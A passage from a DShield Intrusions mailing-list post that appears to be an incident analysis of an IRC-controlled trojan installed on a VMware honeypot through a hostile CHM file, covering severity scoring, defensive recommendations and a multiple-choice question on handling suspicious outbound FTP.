> A search of the TrendMicro website yielded a couple of hits but neither
> of these IRC bots match the description of what I've seen.
>
> 7. Evidence of active targeting
>
> There is no evidence of active targeting.
>
> 8. Severity
>
> Severity = (criticality + lethality) - (system countermeasures +
> network countermeasures)
>
> Criticality:
> Since this was a VMWARE box whose sole existence was predicated on
> running this trojan, the criticality is 1.
>
> Lethality:
> Since this trojan appears to offer remote access to somebody on an IRC
> channel, this box is about as owned as it gets. Therefore, the
> lethality is a 5.
>
> System Countermeasures:
> Since this box didn't have any updates installed on it or any antivirus
> software, its score in this area is a 1.
>
> Network Countermeasures:
> There were not any network countermeasures in place. Score a 1 here.
>
> Severity = (1 + 5) - ( 1 + 1 ) = 4
>
>
> 9. Defensive recommendation
>
> Always keep the systems patch level up to date.  A current patchset
> would have prevented the URL from downloading the hostile CHM file and
> subsequently prevented the trojan from being installed.
>
> Also up-to-date antivirus software would have correctly identified the
> website as having malicious code on it (verified with both McAfee and
> Symantec) and prevented the webpage from working.
>
> Passing all web traffic through an application proxy that was capable
> of screening for the hostile CHM URL format would also have prevented
> the attack from being successful.
>
> 10. Multiple choice Question
>
> Your IDS alerts you that a machine on your network is attempting to FTP
> files whose name appears to be some sort of timestamp. Your site
> doesn't have a policy when it comes to transferring files out of your
> network.  Should you
>
> A) Call the networking group and have the machine disconnected
> immediately?
> B) Block the destination host at the firewall?
> C) Call the system's owner and verify it is authorized activity?
> D) All of the above.
>
> Answer: C. Unless you are absolutely certain that the activity is
> hostile, you should call the system's owner to verify that the activity
> is NOT authorized, especially since your site doesn't have a policy on
> the subject.  You never know if a machine outside of your control is
> supposed to be sending periodic files to a remote server unless you
> verify first.
>
> _______________________________________________
> Intrusions mailing list
> Intrusions@xxxxxxxxxxxxxx
> http://www.dshield.org/mailman/listinfo/intrusions

_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions